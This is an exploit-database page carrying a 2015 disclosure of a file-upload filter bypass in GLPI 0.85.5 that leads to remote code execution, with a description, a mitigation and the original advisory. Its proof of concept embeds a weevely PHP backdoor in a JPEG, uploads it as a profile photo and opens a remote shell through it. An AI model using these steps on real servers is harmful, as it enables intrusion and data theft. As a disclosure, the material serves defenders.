GLPI 0.85.5 RCE through file upload filter bypass

vendor:

GLPI

by:

Raffaele Forte

8,8

CVSS

HIGH

Remote Code Execution

434

CWE

Product Name: GLPI

Affected Version From: GLPI 0.85.5

Affected Version To: GLPI 0.85.5

Patch Exists: YES

Related CWE: N/A

CPE: a:glpi-project:glpi

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: CentOS release 6.7 (Final), PHP 5.3.3

2015

GLPI 0.85.5 RCE through file upload filter bypass

The application allows users to upgrade their own profile. The user has the possibility to add a new photo as attachment. The photo that he uploads will be stored into GLPI_ROOT/files/_pictures/. This file, for example named 'photo.jpeg', will be directly accessible through 'http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg', where 'XXXX' is an ID automatically generated by the system and visible in the HTML source code. Besides, the server does not check the extension of the uploaded file, but only the first bytes within it, that indicates which kind of file is. Exploiting this flaw, an attacker may upload a tampered jpeg file that contains php code placed at the end of the file, so that, just changing the file extention to '.php', by default the php code will be interpreted!

Mitigation:

Ensure that the application is configured to only allow the upload of specific file types and that the file names are not predictable.

Source

Exploit-DB raw data:

# Exploit Title: GLPI 0.85.5 RCE through file upload filter bypass
# Date: September 7th, 2015
# Exploit Author: Raffaele Forte <raffaele@backbox.org>
# Vendor Homepage: http://www.glpi-project.org/
# Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz
# Version: GLPI 0.85.5
# Tested on: CentOS release 6.7 (Final), PHP 5.3.3


I. INTRODUCTION
========================================================================

GLPI is the Information Resource-Manager with an additional 
Administration-Interface. You can use it to build up a database with an 
inventory for your company (computer, software, printers...). It has 
enhanced functions to make the daily life for the administrators easier, 
like a job-tracking-system with mail-notification and methods to build a 
database with basic information about your network-topology.


II. DESCRIPTION
========================================================================


The application allows users to upgrade their own profile. The user has 
the possibility to add a new photo as attachment.

The photo that he uploads will be stored into "GLPI_ROOT/files/_pictures/". 

This file, for example named "photo.jpeg", will be directly accessible 
through "http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg", where "XXXX" 
is an ID automatically generated by the system and visible in the HTML 
source code.

Besides, the server does not check the extension of the uploaded file, 
but only the first bytes within it, that indicates which kind of file is.

Exploiting this flaw, an attacker may upload a tampered jpeg file that 
contains php code placed at the end of the file, so that, just changing 
the file extention to ".php", by default the php code will be interpreted!
 
To trigger this vulnerability it is necessary to have an account.

This vulnerability is a combination of two issues:
- predictable uploaded file names and path
- upload of any kind of file, not limited to images


III. PROOF OF CONCEPT
========================================================================

Generate backdoor:

  user@backbox:~$ weevely generate pass123 /tmp/bd.php
  user@backbox:~$ file /tmp/photo.jpeg 
    /tmp/photo.jpeg: JPEG image data, JFIF standard 1.02
  user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg
  user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php

Upload the new tampered photo in GLPI > Settings

Run terminal to the target:

  user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123


IV. BUSINESS IMPACT
========================================================================
By uploading a interpretable php file, an attacker may be able to 
execute arbitrary code on the server.

This flaw may compromise the integrity of the system and/or expose 
sensitive information.


V. SYSTEMS AFFECTED
========================================================================
GLPI Version 0.85.5 is vulnerable (probably all previous versions)


VI. VULNERABILITY HISTORY
========================================================================
September 7th, 2015: Vulnerability identification
September 25th, 2015: Vendor notification


VII. LEGAL NOTICES
========================================================================
The information contained within this advisory is supplied "as-is" with 
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuseof this 
information.